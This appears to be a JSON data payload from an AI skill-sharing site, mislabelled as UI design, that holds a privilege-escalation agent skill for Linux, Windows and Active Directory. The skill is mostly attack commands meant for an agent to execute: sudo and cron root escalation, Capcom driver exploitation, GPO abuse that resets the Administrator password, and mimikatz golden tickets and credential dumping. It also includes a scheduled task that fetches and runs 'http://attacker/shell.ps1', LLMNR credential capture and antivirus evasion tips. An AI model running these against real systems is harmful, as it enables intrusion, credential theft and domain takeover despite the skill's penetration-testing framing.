[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"skill-89dc567e-e6e9-43f6-8bf5-8019c607d920":3,"$fUzuRGECj_7aMnqSfh1wig9raaVDNl37GN7W1qkEVPsQ":43},{"id":4,"title":5,"description":6,"categoryId":7,"moduleId":8,"tags":9,"prompt":10,"icon":11,"source":12,"sourceUrl":13,"authorId":14,"authorName":15,"isPublic":16,"stars":17,"runs":18,"createdAt":19,"updatedAt":19,"module":20,"category":27,"packages":34},"89dc567e-e6e9-43f6-8bf5-8019c607d920","privilege-escalation-methods","提供从低权限用户到root\u002F管理员访问权限的全面技术，适用于受侵害的Linux和Windows系统。对于渗透测试后的利用阶段和红队行动至关重要。","cat_design_ui","mod_design","sickn33,design","---\nname: privilege-escalation-methods\ndescription: \"Provide comprehensive techniques for escalating privileges from a low-privileged user to root\u002Fadministrator access on compromised Linux and Windows systems. Essential for penetration testing post-exploitation phase and red team operations.\"\nrisk: unknown\nsource: community\nauthor: zebbern\ndate_added: \"2026-02-27\"\n---\n\n# Privilege Escalation Methods\n\n## Purpose\n\nProvide comprehensive techniques for escalating privileges from a low-privileged user to root\u002Fadministrator access on compromised Linux and Windows systems. Essential for penetration testing post-exploitation phase and red team operations.\n\n## Inputs\u002FPrerequisites\n\n- Initial low-privilege shell access on target system\n- Kali Linux or penetration testing distribution\n- Tools: Mimikatz, PowerView, PowerUpSQL, Responder, Impacket, Rubeus\n- Understanding of Windows\u002FLinux privilege models\n- For AD attacks: Domain user credentials and network access to DC\n\n## Outputs\u002FDeliverables\n\n- Root or Administrator shell access\n- Extracted credentials and hashes\n- Persistent access mechanisms\n- Domain compromise (for AD environments)\n\n---\n\n## Core Techniques\n\n### Linux Privilege Escalation\n\n#### 1. Abusing Sudo Binaries\n\nExploit misconfigured sudo permissions using GTFOBins techniques:\n\n```bash\n# Check sudo permissions\nsudo -l\n\n# Exploit common binaries\nsudo vim -c ':!\u002Fbin\u002Fbash'\nsudo find \u002Fetc\u002Fpasswd -exec \u002Fbin\u002Fbash \\;\nsudo awk 'BEGIN {system(\"\u002Fbin\u002Fbash\")}'\nsudo python -c 'import pty;pty.spawn(\"\u002Fbin\u002Fbash\")'\nsudo perl -e 'exec \"\u002Fbin\u002Fbash\";'\nsudo less \u002Fetc\u002Fhosts    # then type: !bash\nsudo man man            # then type: !bash\nsudo env \u002Fbin\u002Fbash\n```\n\n#### 2. Abusing Scheduled Tasks (Cron)\n\n```bash\n# Find writable cron scripts\nls -la \u002Fetc\u002Fcron*\ncat \u002Fetc\u002Fcrontab\n\n# Inject payload into writable script\necho 'chmod +s \u002Fbin\u002Fbash' > \u002Fhome\u002Fuser\u002Fsystemupdate.sh\nchmod +x \u002Fhome\u002Fuser\u002Fsystemupdate.sh\n\n# Wait for execution, then:\n\u002Fbin\u002Fbash -p\n```\n\n#### 3. Abusing Capabilities\n\n```bash\n# Find binaries with capabilities\ngetcap -r \u002F 2>\u002Fdev\u002Fnull\n\n# Python with cap_setuid\n\u002Fusr\u002Fbin\u002Fpython2.6 -c 'import os; os.setuid(0); os.system(\"\u002Fbin\u002Fbash\")'\n\n# Perl with cap_setuid\n\u002Fusr\u002Fbin\u002Fperl -e 'use POSIX (setuid); POSIX::setuid(0); exec \"\u002Fbin\u002Fbash\";'\n\n# Tar with cap_dac_read_search (read any file)\n\u002Fusr\u002Fbin\u002Ftar -cvf key.tar \u002Froot\u002F.ssh\u002Fid_rsa\n\u002Fusr\u002Fbin\u002Ftar -xvf key.tar\n```\n\n#### 4. NFS Root Squashing\n\n```bash\n# Check for NFS shares\nshowmount -e \u003Cvictim_ip>\n\n# Mount and exploit no_root_squash\nmkdir \u002Ftmp\u002Fmount\nmount -o rw,vers=2 \u003Cvictim_ip>:\u002Ftmp \u002Ftmp\u002Fmount\ncd \u002Ftmp\u002Fmount\ncp \u002Fbin\u002Fbash .\nchmod +s bash\n```\n\n#### 5. MySQL Running as Root\n\n```bash\n# If MySQL runs as root\nmysql -u root -p\n\\! chmod +s \u002Fbin\u002Fbash\nexit\n\u002Fbin\u002Fbash -p\n```\n\n---\n\n### Windows Privilege Escalation\n\n#### 1. Token Impersonation\n\n```powershell\n# Using SweetPotato (SeImpersonatePrivilege)\nexecute-assembly sweetpotato.exe -p beacon.exe\n\n# Using SharpImpersonation\nSharpImpersonation.exe user:\u003Cuser> technique:ImpersonateLoggedOnuser\n```\n\n#### 2. Service Abuse\n\n```powershell\n# Using PowerUp\n. .\\PowerUp.ps1\nInvoke-ServiceAbuse -Name 'vds' -UserName 'domain\\user1'\nInvoke-ServiceAbuse -Name 'browser' -UserName 'domain\\user1'\n```\n\n#### 3. Abusing SeBackupPrivilege\n\n```powershell\nimport-module .\\SeBackupPrivilegeUtils.dll\nimport-module .\\SeBackupPrivilegeCmdLets.dll\nCopy-FileSebackupPrivilege z:\\Windows\\NTDS\\ntds.dit C:\\temp\\ntds.dit\n```\n\n#### 4. Abusing SeLoadDriverPrivilege\n\n```powershell\n# Load vulnerable Capcom driver\n.\\eoploaddriver.exe System\\CurrentControlSet\\MyService C:\\test\\capcom.sys\n.\\ExploitCapcom.exe\n```\n\n#### 5. Abusing GPO\n\n```powershell\n.\\SharpGPOAbuse.exe --AddComputerTask --Taskname \"Update\" `\n  --Author DOMAIN\\\u003CUSER> --Command \"cmd.exe\" `\n  --Arguments \"\u002Fc net user Administrator Password!@# \u002Fdomain\" `\n  --GPOName \"ADDITIONAL DC CONFIGURATION\"\n```\n\n---\n\n### Active Directory Attacks\n\n#### 1. Kerberoasting\n\n```bash\n# Using Impacket\nGetUserSPNs.py domain.local\u002Fuser:password -dc-ip 10.10.10.100 -request\n\n# Using CrackMapExec\ncrackmapexec ldap 10.0.2.11 -u 'user' -p 'pass' --kdcHost 10.0.2.11 --kerberoast output.txt\n```\n\n#### 2. AS-REP Roasting\n\n```powershell\n.\\Rubeus.exe asreproast\n```\n\n#### 3. Golden Ticket\n\n```powershell\n# DCSync to get krbtgt hash\nmimikatz# lsadump::dcsync \u002Fuser:krbtgt\n\n# Create golden ticket\nmimikatz# kerberos::golden \u002Fuser:Administrator \u002Fdomain:domain.local `\n  \u002Fsid:S-1-5-21-... \u002Frc4:\u003CNTLM_HASH> \u002Fid:500\n```\n\n#### 4. Pass-the-Ticket\n\n```powershell\n.\\Rubeus.exe asktgt \u002Fuser:USER$ \u002Frc4:\u003CNTLM_HASH> \u002Fptt\nklist  # Verify ticket\n```\n\n#### 5. Golden Ticket with Scheduled Tasks\n\n```powershell\n# 1. Elevate and dump credentials\nmimikatz# token::elevate\nmimikatz# vault::cred \u002Fpatch\nmimikatz# lsadump::lsa \u002Fpatch\n\n# 2. Create golden ticket\nmimikatz# kerberos::golden \u002Fuser:Administrator \u002Frc4:\u003CHASH> `\n  \u002Fdomain:DOMAIN \u002Fsid:\u003CSID> \u002Fticket:ticket.kirbi\n\n# 3. Create scheduled task\nschtasks \u002Fcreate \u002FS DOMAIN \u002FSC Weekly \u002FRU \"NT Authority\\SYSTEM\" `\n  \u002FTN \"enterprise\" \u002FTR \"powershell.exe -c 'iex (iwr http:\u002F\u002Fattacker\u002Fshell.ps1)'\"\nschtasks \u002Frun \u002Fs DOMAIN \u002FTN \"enterprise\"\n```\n\n---\n\n### Credential Harvesting\n\n#### LLMNR Poisoning\n\n```bash\n# Start Responder\nresponder -I eth1 -v\n\n# Create malicious shortcut (Book.url)\n[InternetShortcut]\nURL=https:\u002F\u002Ffacebook.com\nIconIndex=0\nIconFile=\\\\attacker_ip\\not_found.ico\n```\n\n#### NTLM Relay\n\n```bash\nresponder -I eth1 -v\nntlmrelayx.py -tf targets.txt -smb2support\n```\n\n#### Dumping with VSS\n\n```powershell\nvssadmin create shadow \u002Ffor=C:\ncopy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit C:\\temp\\\ncopy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM C:\\temp\\\n```\n\n---\n\n## Quick Reference\n\n| Technique | OS | Domain Required | Tool |\n|-----------|-----|-----------------|------|\n| Sudo Binary Abuse | Linux | No | GTFOBins |\n| Cron Job Exploit | Linux | No | Manual |\n| Capability Abuse | Linux | No | getcap |\n| NFS no_root_squash | Linux | No | mount |\n| Token Impersonation | Windows | No | SweetPotato |\n| Service Abuse | Windows | No | PowerUp |\n| Kerberoasting | Windows | Yes | Rubeus\u002FImpacket |\n| AS-REP Roasting | Windows | Yes | Rubeus |\n| Golden Ticket | Windows | Yes | Mimikatz |\n| Pass-the-Ticket | Windows | Yes | Rubeus |\n| DCSync | Windows | Yes | Mimikatz |\n| LLMNR Poisoning | Windows | Yes | Responder |\n\n---\n\n## Constraints\n\n**Must:**\n- Have initial shell access before attempting escalation\n- Verify target OS and environment before selecting technique\n- Use appropriate tool for domain vs local escalation\n\n**Must Not:**\n- Attempt techniques on production systems without authorization\n- Leave persistence mechanisms without client approval\n- Ignore detection mechanisms (EDR, SIEM)\n\n**Should:**\n- Enumerate thoroughly before exploitation\n- Document all successful escalation paths\n- Clean up artifacts after engagement\n\n---\n\n## Examples\n\n### Example 1: Linux Sudo to Root\n\n```bash\n# Check sudo permissions\n$ sudo -l\nUser www-data may run the following commands:\n    (root) NOPASSWD: \u002Fusr\u002Fbin\u002Fvim\n\n# Exploit vim\n$ sudo vim -c ':!\u002Fbin\u002Fbash'\nroot@target:~# id\nuid=0(root) gid=0(root) groups=0(root)\n```\n\n### Example 2: Windows Kerberoasting\n\n```bash\n# Request service tickets\n$ GetUserSPNs.py domain.local\u002Fjsmith:Password123 -dc-ip 10.10.10.1 -request\n\n# Crack with hashcat\n$ hashcat -m 13100 hashes.txt rockyou.txt\n```\n\n---\n\n## Troubleshooting\n\n| Issue | Solution |\n|-------|----------|\n| sudo -l requires password | Try other enumeration (SUID, cron, capabilities) |\n| Mimikatz blocked by AV | Use Invoke-Mimikatz or SafetyKatz |\n| Kerberoasting returns no hashes | Check for service accounts with SPNs |\n| Token impersonation fails | Verify SeImpersonatePrivilege is present |\n| NFS mount fails | Check NFS version compatibility (vers=2,3,4) |\n\n---\n\n## Additional Resources\n\nFor detailed enumeration scripts, use:\n- **LinPEAS**: Linux privilege escalation enumeration\n- **WinPEAS**: Windows privilege escalation enumeration\n- **BloodHound**: Active Directory attack path mapping\n- **GTFOBins**: Unix binary exploitation reference\n\n## When to Use\nThis skill is applicable to execute the workflow or actions described in the overview.\n","","imported","https:\u002F\u002Fgithub.com\u002Fsickn33\u002Fantigravity-awesome-skills","user_system_seed","SkillOPIC",true,133,1702,"2026-05-16 13:34:53",{"id":8,"name":21,"slug":22,"icon":23,"description":24,"sort":25,"createdAt":26},"设计创意","design","mdi-palette-outline","UI 设计、生成艺术、品牌视觉等创意 Skill",3,"2026-05-16 12:53:40",{"id":7,"name":28,"slug":29,"icon":30,"description":31,"moduleId":8,"sort":32,"skillCount":33,"createdAt":26},"UI 设计","ui-design","mdi-monitor-cellphone","界面设计、交互规范、设计系统",1,36,[35],{"id":36,"skillId":4,"version":37,"fileName":38,"fileSize":39,"filePath":40,"fileHash":41,"manifest":42,"createdAt":19},"a24dea48-02d8-4389-902a-b67c51bd09c3","1.0.0","privilege-escalation-methods.zip",3498,"uploads\u002Fskills\u002F89dc567e-e6e9-43f6-8bf5-8019c607d920\u002Fprivilege-escalation-methods.zip","5fb7b6112e942e6c7e2d6cd88001586a55d6b63523daa0779b6527cfb14fbeb9","[{\"path\":\"SKILL.md\",\"isDirectory\":false,\"size\":8164}]",{"code":44,"message":45,"data":46},200,"success",{"items":47,"stats":48,"page":51},[],{"averageRating":49,"totalRatings":49,"ratingCounts":50},0,[49,49,49,49,49],{"limit":52,"offset":49,"hasMore":53,"nextOffset":52,"ratedOnly":16},15,false]